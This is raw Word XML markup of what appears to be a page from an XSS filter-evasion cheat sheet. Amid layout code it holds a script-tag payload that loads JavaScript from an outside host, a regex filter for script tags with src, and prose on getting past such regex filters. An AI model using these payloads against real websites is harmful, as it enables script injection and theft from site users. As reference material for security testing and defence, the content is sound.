                <v:shape id="Freeform 613" o:spid="_x0000_s1819" style="position:absolute;width:4545;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="454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ZtusIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0YrCMBRE3wX/IVxhX0TTihSpRhFhWWFhweoHXJpr&#10;W0xuShK1/v1mYcHHYWbOMJvdYI14kA+dYwX5PANBXDvdcaPgcv6crUCEiKzROCYFLwqw245HGyy1&#10;e/KJHlVsRIJwKFFBG2NfShnqliyGueuJk3d13mJM0jdSe3wmuDVykWWFtNhxWmixp0NL9a26WwXf&#10;X8vsVhU/p2hextf2EKaGVkp9TIb9GkSkIb7D/+2jVlDkOfydS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Vm26wgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m4523,182l21,182r-3,l,161r,-3l,21,21,,4523,r21,21l4544,161r-18,21l4523,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4523,182;21,182;18,182;0,161;0,158;0,21;21,0;4523,0;4544,21;4544,161;4526,182;4523,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 612" o:spid="_x0000_s1820" type="#_x0000_t202" style="position:absolute;width:454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Mxu8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kE6m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zMbv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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="61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a="&gt;"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr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102"/>
        <w:ind w:left="154"/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15872000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2838450</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="607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4470" y="108"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="608" name="Freeform 610"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4469" y="108"/>
                            <a:ext cx="742" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5190 4470"/>
                              <a:gd name="T1" fmla="*/ T0 w 742"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4491 4470"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4488 4470"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4470 4470"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4470 4470"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4470 4470"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4491 4470"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5190 4470"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5211 4470"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5211 4470"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5193 4470"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5190 4470"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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Text Box 609"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4469" y="108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8" o:spid="_x0000_s1821" style="position:absolute;left:0;text-align:left;margin-left:223.5pt;margin-top:5.4pt;width:37.1pt;height:9.15pt;z-index:15872000;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4470,108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">
                <v:shape id="Freeform 610" o:spid="_x0000_s1822" style="position:absolute;left:4469;top:108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vQcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H/gO4QjejDXRi7J1jSKDoY7CmO0DHJpj&#10;W2xOShNrffvlYrDLj+8/3822FxONvnOsYZ0oEMS1Mx03Gqry8+UVhA/IBnvHpOFBHnbbxVOOmXF3&#10;/qHpHBoRQ9hnqKENYcik9HVLFn3iBuLIXdxoMUQ4NtKMeI/htpcbpVJpsePY0OJAHy3V1/PNajic&#10;it7PFR5tiW/rr++rKqZnpfVqOe/fQQSaw7/4z300GlIV18Yz8Qj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jK9BwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,290;21,290;18,290;0,269;0,266;0,129;21,108;720,108;741,129;741,269;723,290;720,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 609" o:spid="_x0000_s1823" type="#_x0000_t202" style="position:absolute;left:4469;top:108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41F8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5rUw6Jbo0hREITSdXvo8XXz&#10;3A1uXtZN1O2/b4RCj8PMfMMs14NrxY36YD1reJkqEMSVN5ZrDZ/l7nkOIkRkg61n0vBDAdar0dMS&#10;c+PvXNDtGGuRIBxy1NDE2OVShqohh2HqO+LknXzvMCbZ19L0eE9w18qZUpl0aDktNNjRW0PV+Xh1&#10;GjZfXGzt5f37ozgVtiwXig/ZWevJeNi8gog0xP/wX3tvNGRqAY8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TjUX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&lt;SCRIPT&gt;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For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>performing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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sites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allow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>way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regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="1310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73024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5978525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-118110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="154305" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="604" name="Group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305" cy="116205"/>
                          <a:chOff x="9415" y="-186"/>
                          <a:chExt cx="243" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="605" name="Picture 6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14" y="-187"/>
                            <a:ext cx="24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6" name="Text Box 606"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9414" y="-187"/>
                            <a:ext cx="24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9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/\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5" o:spid="_x0000_s1824" style="position:absolute;left:0;text-align:left;margin-left:470.75pt;margin-top:-9.3pt;width:12.15pt;height:9.15pt;z-index:15873024;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="9415,-186" coordsize="243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">
                <v:shape id="Picture 607" o:spid="_x0000_s1825" type="#_x0000_t75" style="position:absolute;left:9414;top:-187;width:243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nFBrGAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxEj09rAjEUxO8Fv0N4BS9FE4sV2ZoVKwiK&#10;J1eFHl83b/+0m5dlE3X77Ruh4HGYmd8wi2VvG3GlzteONUzGCgRx7kzNpYbTcTOag/AB2WDjmDT8&#10;kodlOnhaYGLcjQ90zUIpIoR9ghqqENpESp9XZNGPXUscvcJ1FkOUXSlNh7cIt418VWomLdYcFyps&#10;aV1R/pNdrIbsJKfr8/48eWk+N7vi6/twUeFD6+Fzv3oHEagPj/B/e2s0zNQb3M/EIyDT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GcUGsYAAADcAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId53" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 606" o:spid="_x0000_s1826" type="#_x0000_t202" style="position:absolute;left:9414;top:-187;width:243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GhZcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3sxuewg1uooUhUKhNMaDx9fs&#10;M1nMvo3Zrab/vlsoeBxm5htmuR5dJ640BOtZw1OmQBDX3lhuNByq3ewFRIjIBjvPpOGHAqxX08kS&#10;C+NvXNJ1HxuRIBwK1NDG2BdShrolhyHzPXHyTn5wGJMcGmkGvCW46+SzUrl0aDkttNjTa0v1ef/t&#10;NGyOXG7t5ePrszyVtqrmit/zs9aPD+NmASLSGO/h//ab0ZCrHP7Op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0aFl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9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/\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73536" behindDoc="0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51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4598670" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="601" name="Group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8670" cy="116205"/>
                          <a:chOff x="1614" y="81"/>
                          <a:chExt cx="7242" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="602" name="Freeform 604"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="81"/>
                            <a:ext cx="7242" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8835 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7242"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7242"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7242"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7242"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7242"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7242"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7242"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8835 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7242"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8856 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7242"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8856 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7242"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8838 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7242"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8835 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7242"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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242" h="183">
                                <a:moveTo>
                                  <a:pt x="722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21" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7242" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7242" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7224" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="722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Text Box 60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81"/>
                            <a:ext cx="72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&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i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2" o:spid="_x0000_s1827" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:4.05pt;width:362.1pt;height:9.15pt;z-index:15873536;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,81" coordsize="72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">
                <v:shape id="Freeform 604" o:spid="_x0000_s1828" style="position:absolute;left:1614;top:81;width:7242;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="72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4gfMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74L/ITyhN03iQWQ1ipQKSk+77cXbY/O6&#10;u3TzEjZR1/76plDwOMzMN8x2P7pe3GiInWcDeqFAENfedtwY+Pw4ztcgYkK22HsmAw+KsN9NJ1ss&#10;rL9zSbcqNSJDOBZooE0pFFLGuiWHceEDcfa+/OAwZTk00g54z3DXy6VSK+mw47zQYqDXlurv6uoM&#10;/JRdH2K4HtT7udK6fNMXWWtjXmbjYQMi0Zie4f/2yRpYqSX8nclH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4gfMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m7221,182l21,182r-3,l,161r,-3l,21,21,,7221,r21,21l7242,161r-18,21l7221,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7221,263;21,263;18,263;0,242;0,239;0,102;21,81;7221,81;7242,102;7242,242;7224,263;7221,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 603" o:spid="_x0000_s1829" type="#_x0000_t202" style="position:absolute;left:1614;top:81;width:72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YC/cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/CE3mpiC4tdjSKlBaEgrttDj8/N&#10;cze4edluom7/vRGEHoeZ+YaZLwfXijP1wXrWMBkrEMSVN5ZrDd/l5/MURIjIBlvPpOGPAiwXjw9z&#10;zI2/cEHnXaxFgnDIUUMTY5dLGaqGHIax74iTd/C9w5hkX0vT4yXBXStflMqkQ8tpocGO3huqjruT&#10;07D64eLD/m722+JQ2LJ8U/yVHbV+Gg2rGYhIQ/wP39troyFTr3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gL9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&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i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(this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an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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="3008" w:space="634"/>
            <w:col w:w="1256" w:space="1224"/>
            <w:col w:w="2898"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="154"/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15872512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4034155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-287655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="856615" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="598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6615" cy="116205"/>
                          <a:chOff x="6353" y="-453"/>
                          <a:chExt cx="1349" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="599" name="Freeform 601"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6352" y="-454"/>
                            <a:ext cx="1349" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7680 6353"/>
                              <a:gd name="T1" fmla="*/ T0 w 1349"/>
                              <a:gd name="T2" fmla="+- 0 -271 -453"/>
                              <a:gd name="T3" fmla="*/ -271 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6374 6353"/>
                              <a:gd name="T5" fmla="*/ T4 w 1349"/>
                              <a:gd name="T6" fmla="+- 0 -271 -453"/>
                              <a:gd name="T7" fmla="*/ -271 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6371 6353"/>
                              <a:gd name="T9" fmla="*/ T8 w 1349"/>
                              <a:gd name="T10" fmla="+- 0 -272 -453"/>
                              <a:gd name="T11" fmla="*/ -272 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6353 6353"/>
                              <a:gd name="T13" fmla="*/ T12 w 1349"/>
                              <a:gd name="T14" fmla="+- 0 -292 -453"/>
                              <a:gd name="T15" fmla="*/ -292 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6353 6353"/>
                              <a:gd name="T17" fmla="*/ T16 w 1349"/>
                              <a:gd name="T18" fmla="+- 0 -295 -453"/>
                              <a:gd name="T19" fmla="*/ -295 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6353 6353"/>
                              <a:gd name="T21" fmla="*/ T20 w 1349"/>
                              <a:gd name="T22" fmla="+- 0 -432 -453"/>
                              <a:gd name="T23" fmla="*/ -432 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6374 6353"/>
                              <a:gd name="T25" fmla="*/ T24 w 1349"/>
                              <a:gd name="T26" fmla="+- 0 -453 -453"/>
                              <a:gd name="T27" fmla="*/ -453 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7680 6353"/>
                              <a:gd name="T29" fmla="*/ T28 w 1349"/>
                              <a:gd name="T30" fmla="+- 0 -453 -453"/>
                              <a:gd name="T31" fmla="*/ -453 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7702 6353"/>
                              <a:gd name="T33" fmla="*/ T32 w 1349"/>
                              <a:gd name="T34" fmla="+- 0 -432 -453"/>
                              <a:gd name="T35" fmla="*/ -432 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7702 6353"/>
                              <a:gd name="T37" fmla="*/ T36 w 1349"/>
                              <a:gd name="T38" fmla="+- 0 -292 -453"/>
                              <a:gd name="T39" fmla="*/ -292 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7684 6353"/>
                              <a:gd name="T41" fmla="*/ T40 w 1349"/>
                              <a:gd name="T42" fmla="+- 0 -272 -453"/>
                              <a:gd name="T43" fmla="*/ -272 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7680 6353"/>
                              <a:gd name="T45" fmla="*/ T44 w 1349"/>
                              <a:gd name="T46" fmla="+- 0 -271 -453"/>
                              <a:gd name="T47" fmla="*/ -27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49" h="183">
                                <a:moveTo>
                                  <a:pt x="1327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27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1349" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1349" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132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Text Box 600"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6352" y="-454"/>
                            <a:ext cx="134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41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\&lt;script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7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src...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9" o:spid="_x0000_s1830" style="position:absolute;left:0;text-align:left;margin-left:317.65pt;margin-top:-22.65pt;width:67.45pt;height:9.15pt;z-index:15872512;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6353,-453" coordsize="134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">
                <v:shape id="Freeform 601" o:spid="_x0000_s1831" style="position:absolute;left:6352;top:-454;width:1349;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="134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BScMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVeim6UaiY1FXUIhSkBzX0/JJ9&#10;JtHs25BdY/z3bkHwOMzMN8xs0ZtadNS6yrKC0TACQZxbXXGhID1sBlMQziNrrC2Tghs5WMxfX2aY&#10;aHvlHXV7X4gAYZeggtL7JpHS5SUZdEPbEAfvaFuDPsi2kLrFa4CbWo6jaCINVhwWSmxoXVJ+3l+M&#10;gt0t/XBxlp3+0vGxy1bbA/5G30q9v/XLLxCeev8MP9o/WsFnHMP/mXAE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AFJwxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1327,182l21,182r-3,-1l,161r,-3l,21,21,,1327,r22,21l1349,161r-18,20l1327,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1327,-271;21,-271;18,-272;0,-292;0,-295;0,-432;21,-453;1327,-453;1349,-432;1349,-292;1331,-272;1327,-271" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 600" o:spid="_x0000_s1832" type="#_x0000_t202" style="position:absolute;left:6352;top:-454;width:134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ScisIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/Y/hDfwNhN3KFtnKiIOBEFWu8OOb81r&#10;G2xeahO1/vfLYbDjx/d7uZpcL640ButZw2KuQBDX3lhuNXxVH8+vIEJENth7Jg13CrAqHh+WmBt/&#10;45Kux9iKFMIhRw1djEMuZag7chjmfiBOXONHhzHBsZVmxFsKd718USqTDi2nhg4H2nRUn44Xp2H9&#10;zeXWng8/n2VT2qp6U7zPTlrPnqb1O4hIU/wX/7l3RkOm0vx0Jh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dJyK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41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\&lt;script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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src...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important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>one,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I've</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>seen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regex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wild):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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2608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2832100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="595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16205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="4460" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="596" name="Freeform 598"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="4460" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6052 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4460"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4460"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4460"/>
